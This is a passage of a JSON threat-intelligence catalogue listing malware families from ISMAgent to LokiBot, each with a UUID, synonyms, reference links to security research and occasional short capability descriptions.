Rerdom) sometimes got wrongly labelled.\r\n\r\nIn April 2016 a combination of Gozi ISFB and Nymaim was detected. This breed became known as GozNym. The merge uses a shellcode-like version of Gozi ISFB, that needs Nymaim to run. The C2 communication is performed by Nymaim.\r\n\r\nSee win.gozi for additional historical information." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", - "http://www.clearskysec.com/ismagent/" - ] - }, - "uuid": "67457708-1edd-4ef1-9ec0-1c5eb7c75fe2", - "value": "ISMAgent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor", - "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", - "http://www.clearskysec.com/greenbug/" - ] - }, - "uuid": "e09d8dd6-6857-4607-a0ba-9c8d2a66083b", - "value": "ISMDoor", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger", - "https://www.zscaler.com/blogs/research/ispy-keylogger" - ] - }, - "uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070", - "value": "iSpy Keylogger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.isr_stealer", - "https://securingtomorrow.mcafee.com/mcafee-labs/phishing-attacks-employ-old-effective-password-stealer/" - ] - }, - "uuid": "27bab2fb-d324-42c2-9df3-669bb87c3989", - "value": "ISR Stealer", - "description": "ISR Stealer is a modified version of the Hackhound Stealer. It is written in VB and often comes in a .NET-wrapper.\r\nISR Stealer makes use of two Nirsoft tools: Mail PassView and WebBrowserPassView.\r\n\r\nIncredibly, it uses an hard-coded user agent string: HardCore Software For : Public" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" - ] - }, - "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a", - "value": "IsSpace", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/" - ] - }, - "uuid": "3acb37f4-5614-4932-b12f-9f1c256895f2", - "value": "JackPOS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff", - "http://malware-traffic-analysis.net/2017/05/16/index.html", - "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", - "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html" - ] - }, - "uuid": "2c51a717-726b-4813-9fcc-1265694b128e", - "value": "Jaff", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jager_decryptor" - ] - }, - "uuid": "13a7a2ff-c945-4b42-a112-dcf09f9ed9c9", - "value": "Jager Decryptor", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Reconcyc" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaku", - "https://www-01.ibm.com/support/docview.wss?uid=ssg1S1010146", - "https://www.forcepoint.com/sites/default/files/resources/files/report_jaku_analysis_of_botnet_campaign_en_0.pdf" - ] - }, - "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112", - "value": "Jaku", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "af6e89ec-0adb-4ce6-b4e6-610827e722ea", - "value": "Jasus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jigsaw" - ] - }, - "uuid": "910c3fd2-56e5-4f1d-8df0-2aa0b293b7d9", - "value": "Jigsaw", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jimmy", - "https://securelist.com/jimmy-nukebot-from-neutrino-with-love/81667/" - ] - }, - "uuid": "551b568f-68fa-4483-a10c-a6452ae6289e", - "value": "Jimmy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap", - "https://www.us-cert.gov/ncas/alerts/TA18-149A", - "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", - "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" - ] - }, - "uuid": "bbbef449-2fe6-4c25-a85c-69af9fa6208b", - "value": "Joanap", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.joao", - "https://www.welivesecurity.com/2017/08/22/gamescom-2017-fun-blackhats/" - ] - }, - "uuid": "8201c8d2-1dab-4473-bbdf-42952b3d5fc6", - "value": "Joao", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jolob", - "http://pwc.blogs.com/cyber_security_updates/2014/10/scanbox-framework-whos-affected-and-whos-using-it-1.html" - ] - }, - "uuid": "97f12ca8-dc84-4a8c-b4c6-8ec1d1e79631", - "value": "Jolob", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jqjsnicker", - "http://marcmaiffret.com/vault7/" - ] - }, - "uuid": "2e457b93-de45-4b1d-8e1d-b8d19c2c555a", - "value": "JQJSNICKER", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot", - "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" - ] - }, - "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2", - "value": "JripBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent", - "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] - }, - "uuid": "eab42a8e-22e7-49e4-8a26-44f14b6f67bb", - "value": "KAgent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - }, - "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb", - "value": "Karagany", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kardonloader", - "https://asert.arbornetworks.com/kardon-loader-looks-for-beta-testers/", - "https://engineering.salesforce.com/kardon-loader-malware-analysis-adaaaab42bab" - ] - }, - "uuid": "8b33ba21-9af7-4536-bd02-23dd863147e8", - "value": "Kardon Loader", - "description": "According to ASERT, Kardon Loader is a fully featured downloader, enabling the download and installation of other malware, eg. banking trojans/credential theft etc.This malware has been on sale by an actor under the username Yattaze, starting in late April. The actor offers the sale of the malware as a standalone build with charges for each additional rebuild, or the ability to set up a botshop in which case any customer can establish their own operation and further sell access to a new customer base." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.karius", - "https://dissectmalware.wordpress.com/2018/03/28/multi-stage-powershell-script/", - "https://research.checkpoint.com/banking-trojans-development/" - ] - }, - "uuid": "8a01c3be-17b7-4e5a-b0b2-6c1f5ccb82cf", - "value": "Karius", - "description": "According to checkpoint, Karius is a banking trojan in development, borrowing code from Ramnit, Vawtrack as well as Trickbot, currently implementing webinject attacks only.\r\n\r\nIt comes with an injector that loads an intermediate \"proxy\" component, which in turn loads the actual banker component.\r\n\r\nCommunication with the c2 are in json format and encrypted with RC4 with a hardcoded key.\r\n\r\nIn the initial version, observed in March 2018, the webinjects were hardcoded in the binary, while in subsequent versions, they were received by the c2.\r\n\r\n" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kasperagent", - "http://researchcenter.paloaltonetworks.com/2017/04/unit42-targeted-attacks-middle-east-using-kasperagent-micropsia/", - "https://www.threatconnect.com/blog/kasperagent-malware-campaign/" - ] - }, - "uuid": "d9c14095-8885-406c-b56b-06f3a1a88c1c", - "value": "KasperAgent", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar", - "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" - ] - }, - "uuid": "bab92070-3589-4b7e-bf05-4f54bfefc2ca", - "value": "Kazuar", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip" - ] - }, - "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755", - "value": "Kegotip", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos", - "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", - "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", - "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", - "https://en.wikipedia.org/wiki/Kelihos_botnet" - ] - }, - "uuid": "7d69892e-d582-4545-8798-4a9a84a821ea", - "value": "Kelihos", - "description": "" - }, - { - "meta": { - "synonyms": [ - "TSSL" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy", - "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html", - "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", - "https://citizenlab.ca/2016/11/parliament-keyboy/", - "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/" - ] - }, - "uuid": "28c13455-7f95-40a5-9568-1e8732503507", - "value": "KeyBoy", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.keylogger_apt3", - "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", - "https://twitter.com/smoothimpact/status/773631684038107136", - "https://intrusiontruth.wordpress.com/2017/05/09/apt3-is-boyusec-a-chinese-intelligence-contractor/" - ] - }, - "uuid": "68039fbe-2eee-4666-b809-32a011e9852a", - "value": "APT3 Keylogger", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", - "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A" - ] - }, - "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5", - "value": "KEYMARBLE", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat", - "https://blogs.forcepoint.com/security-labs/trojanized-adobe-installer-used-install-dragonok%E2%80%99s-new-custom-backdoor", - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-updated-khrat-malware-used-in-cambodia-attacks/" - ] - }, - "uuid": "361d3f09-8bc8-4b5a-803f-8686cf346047", - "value": "KHRAT", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac", - "https://www.group-ib.com/resources/threat-research/silence.html" - ] - }, - "uuid": "f2ca304f-6577-4f3a-983c-beec447a9493", - "value": "Kikothac", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.killdisk", - "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://blog.trendmicro.com/trendlabs-security-intelligence/new-killdisk-variant-hits-financial-organizations-in-latin-america/" - ] - }, - "uuid": "e81f3e3f-966c-4c99-8d4b-fc0a1d3bb027", - "value": "KillDisk", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Kasper Internet Non-Security", - "Maple" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kins", - "https://blog.malwarebytes.com/threat-analysis/2014/02/hiding-in-plain-sight-a-story-about-a-sneaky-banking-trojan/", - "https://github.com/nyx0/KINS", - "https://securityintelligence.com/zeus-maple-variant-targets-canadian-online-banking-customers/", - "https://www.youtube.com/watch?v=C-dEOt0GzSE" - ] - }, - "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11", - "value": "KINS", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd", - "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", - "https://www.morphick.com/resources/news/klrd-keylogger" - ] - }, - "uuid": "70459959-5a20-482e-b714-2733f5ff310e", - "value": "KLRD", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic", - "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", - "https://github.com/zerosum0x0/koadic" - ] - }, - "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6", - "value": "Koadic", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt", - "https://twitter.com/struppigel/status/812726545173401600" - ] - }, - "uuid": "f7674d06-450a-4150-9180-afef94cce53c", - "value": "KokoKrypt", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni", - "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html", - "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html", - "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/", - "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant" - ] - }, - "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf", - "value": "Konni", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface" - ] - }, - "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3", - "value": "KoobFace", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Bisonal" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia", - "https://securitykitten.github.io/2014/11/25/curious-korlia.html", - "https://camal.coseinc.com/publish/2013Bisonal.pdf", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/", - "https://www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf", - "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit" - ] - }, - "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7", - "value": "Korlia", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter", - "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/", - "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/", - "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf" - ] - }, - "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e", - "value": "Kovter", - "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter become fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter was packed together\r\nJan 2018 - Cyclance report on Persistence" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer", - "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/" - ] - }, - "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d", - "value": "KPOT Stealer", - "description": "" - }, - { - "meta": { - "synonyms": [ - "BlackMoon" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker", - "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan", - "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf", - "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/", - "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/" - ] - }, - "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce", - "value": "KrBanker", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader", - "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework" - ] - }, - "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972", - "value": "KrDownloader", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Osiris" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos", - "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack", - "https://www.proofpoint.com/us/threat-insight/post/kronos-reborn", - "https://blog.malwarebytes.com/threat-analysis/2016/10/new-looking-sundown-ek-drops-smoke-loader-kronos-banker/", - "https://www.lexsi.com/securityhub/overview-kronos-banking-malware-rootkit/?lang=en", - "https://research.checkpoint.com/deep-dive-upas-kit-vs-kronos/", - "https://www.lexsi.com/securityhub/kronos-decrypting-the-configuration-file-and-injects/?lang=en", - "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware-p2/", - "https://www.morphick.com/resources/news/scanpos-new-pos-malware-being-distributed-kronos", - "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/", - "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware", - "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/" - ] - }, - "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17", - "value": "Kronos", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Barys", - "Gofot", - "Kuaibpy" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8" - ] - }, - "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7", - "value": "Kuaibu", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz" - ] - }, - "uuid": "f9b3757e-99c7-4999-8b79-87609407f895", - "value": "Kuluoz", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton", - "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" - ] - }, - "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58", - "value": "Kurton", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs", - "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia" - ] - }, - "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3", - "value": "Kwampirs", - "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert", - "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", - "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7", - "http://adelmas.com/blog/longhorn.php", - "https://www.youtube.com/watch?v=jeLd-gw2bWo" - ] - }, - "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d", - "value": "Lambert", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin", - "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/" - ] - }, - "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0", - "value": "Lamdelin", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot", - "http://malware-traffic-analysis.net/2017/04/25/index.html", - "https://www.fireeye.com/blog/threat-research/2015/12/latentbot_trace_me.html", - "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/", - "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/", - "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access" - ] - }, - "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0", - "value": "LatentBot", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus", - "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/", - "https://twitter.com/PhysicalDrive0/status/828915536268492800", - "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html", - "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html" - ] - }, - "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0", - "value": "Lazarus", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok", - "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector", - "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802" - ] - }, - "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72", - "value": "Laziok", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash", - "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/" - ] - }, - "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d", - "value": "Leash", - "description": "" - }, - { - "meta": { - "synonyms": [ - "shoco" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia", - "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf", - "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html", - "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html" - ] - }, - "uuid": "41da41aa-0729-428a-8b82-636600f8e230", - "value": "Leouncia", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic", - "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/", - "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/", - "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html", - "http://www.malware-traffic-analysis.net/2017/11/02/index.html" - ] - }, - "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f", - "value": "Lethic", - "description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail" - ] - }, - "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b", - "value": "Limitail", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" - ] - }, - "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac", - "value": "Listrix", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp", - "https://malware.news/t/recent-litehttp-activities-and-iocs/21053", - "https://github.com/zettabithf/LiteHTTP" - ] - }, - "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8", - "value": "LiteHTTP", - "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. \r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky", - "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html", - "https://blog.malwarebytes.com/threat-analysis/2017/01/locky-bart-ransomware-and-backend-server-analysis/", - "https://blog.malwarebytes.com/threat-analysis/2016/03/look-into-locky/", - "https://www.bleepingcomputer.com/news/security/locky-ransomware-returns-but-targets-only-windows-xp-and-vista/", - "http://blog.talosintelligence.com/2017/06/necurs-locky-campaign.html", - "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", - "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", - "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" - ] - }, - "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", - "value": "Locky", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" - ] - }, - "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", - "value": "Locky (Decryptor)", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader" - ] - }, - "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", - "value": "Locky Loader", - "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos", - "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", - "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", - "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" - ] - }, - "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", - "value": "LockPOS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Nymeria" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", - "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", - "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" - ] - }, - "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", - "value": "Loda", - "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as \u201cTrojan.Nymeria\u201d, although the connection is not well-documented." - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut", - "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] - }, - "uuid": "70cd1eb4-0410-47c6-8817-418380240d85", - "value": "Logedrut", - "description": "" - }, - { - "meta": { - "synonyms": [], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos", - "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" - ] - }, - "uuid": "2789b246-d762-4d38-8cc8-302293e314da", - "value": "LogPOS", - "description": "" - }, - { - "meta": { - "synonyms": [ - "Loki", - "LokiPWS", - "LokiBot" - ], - "type": [], - "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", - 